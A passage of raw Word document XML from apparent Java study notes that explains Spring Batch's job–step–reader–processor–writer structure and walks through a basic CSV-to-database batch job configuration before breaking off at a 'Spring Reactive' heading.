        </w:rPr>
        <w:t xml:space="preserve"> that consist of one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each step does a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read → process → write</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46E85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74" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CB158"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Core Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C3F22" w14:textId="66D2E729"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br/>
        <w:t>Reads one item at a time from a data source (file, DB, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496A592" w14:textId="4C07139E" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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w:t>
      </w:r>
      <w:r w:rsidR="00E76A6A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Transforms the input data (e.g., validation, conversion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A9E17" w14:textId="4353AAD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br/>
        <w:t>Writes processed data to a target (file, DB, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FC035" w14:textId="08026925"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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Stores metadata about job execution (status, count, time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D81CD" w14:textId="33D82F00"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Launcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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75" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514306E"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CE4B95" w14:paraId="5AF5B92C" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429299A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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="2373CE84" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FCDC1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rows from CSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="63C5791B" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC66B6E"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and transforms data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43640" w:rsidRPr="00CE4B95" w14:paraId="4C9531BF" w14:textId="77777777" w:rsidTr="00D43640">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C3F88C"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s records into DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12A24687"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76" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76787039"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Flowchart of Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7376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bLauncher --&gt; Job --&gt; Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E750637"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C54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t; ItemReader --&gt; ItemProcessor --&gt; ItemWriter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB613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77" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DB91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figuration (Java-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD6908"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613241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D159A"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91256B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6F96676D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AA77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4BC7B5E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79B57B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D818CD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4906F"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025CFF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75A8D25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6899F45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753FE2B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9149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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6DE36"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6E4787C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931703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08AA65A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0C0AFE6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32C915" w14:textId="4A91CFDE"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4C5061"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78" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4867B"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898167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 skip or retry failed records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1CD4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eners</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – handle before/after job or step actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C3F8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itioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – parallelize batch jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D3299"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Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – pass runtime values like file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FADF49"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79" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54ED3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Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CBD2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Extract, Transform, Load) jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149081B8"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thly billing or payroll processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD247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or cleansing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FBF086"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0A47069F"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80" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AA9A3" w14:textId="77777777" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="00D43640">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C68A9E"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95" w:name="_Toc197867709"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement the spring batch?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w14:paraId="5C806E00" w14:textId="433B1E05" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="001F092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ing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nvolves setting up jobs and steps that follow the read → process → write pattern. Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>step-by-step guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a working </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java config-based example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help you get started quickly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608D04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81" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B7C0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Add Maven Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FA20F"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A69145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C3DD68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batch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B9DC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74BFF57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0338B5D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1A4CA41"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jdbc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFEE9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24A0F29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D868B1A"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h2database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9349E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h2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686D42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scope&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54160A74" w14:textId="5491F18B"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B83CF66"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2 is just for demo. You can replace it with your preferred DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB847A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82" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA1DC7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Define a Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A788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8ED74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irstName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6229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astName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9596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78F71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s and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2F565" w14:textId="429AFA43"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091881"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83" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDD25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3: Reader - Read from CSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930A92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AD66FF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17FE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Buil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p>
    <w:p w14:paraId="5BE413BC"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sonItemReader"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5FF3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PathResourc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ple-data.csv"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABEA3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limited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945440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astName"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EB626"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23AEBD3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061B85E4" w14:textId="60ED9B3E"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A4656C7"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84" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C0571"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4: Processor (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D3AC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ItemProcess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CBE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72FD83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roce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870B7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54CF279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2A2E025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955FC" w14:textId="4F1B7AB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142595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85" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969775C"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5: Writer - Write to Console or DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB1BB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C232A7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057F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DC796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2B0F75"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rit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66FCD29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27076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A8ED1" w14:textId="4F2EE9E8"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35E7F3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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43AED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6: Configure Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1CDA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422CAC4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46D9393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1674D9A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1BCDEFD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7230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1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388DE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14C7E03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52F27C6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3B9C032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6B324A7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F1A9CAA" w14:textId="60C6BA8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60A8C75"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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB37F9"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7: Configure Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F93D07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4B246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importUser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260C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mportUserJob"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86DFC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20446F7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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C75510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BB2F5E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F1C8BAB" w14:textId="48B0F75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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950A0D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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A4CB1" w14:textId="77777777" w:rsidR="00B22855" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22855" w:rsidP="00832B7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC6B53F" w14:textId="77777777" w:rsidR="00B22855" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22855" w:rsidP="00832B7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3536999E" w14:textId="1DFCF16D"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8: Run the Batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB00982"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3591A"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SV Sample (resources/sample-data.csv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A859541"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hn,Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB8EDF"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ne,Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364B396"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90" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A72A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 Projects Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C9555"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ader from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Kafka</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ST API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99A79B"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riter to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mai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lastic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFDB53"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JobLauncher to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a batch job via REST or schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DB5EC"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91" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E05953" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FC0468" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5341B936" w14:textId="4C59B5BC" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="496" w:name="_Toc197867710"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Reactive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w14:paraId="1B6B3402" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF636B3" w14:textId="273C1829"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97" w:name="_Toc197867711"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
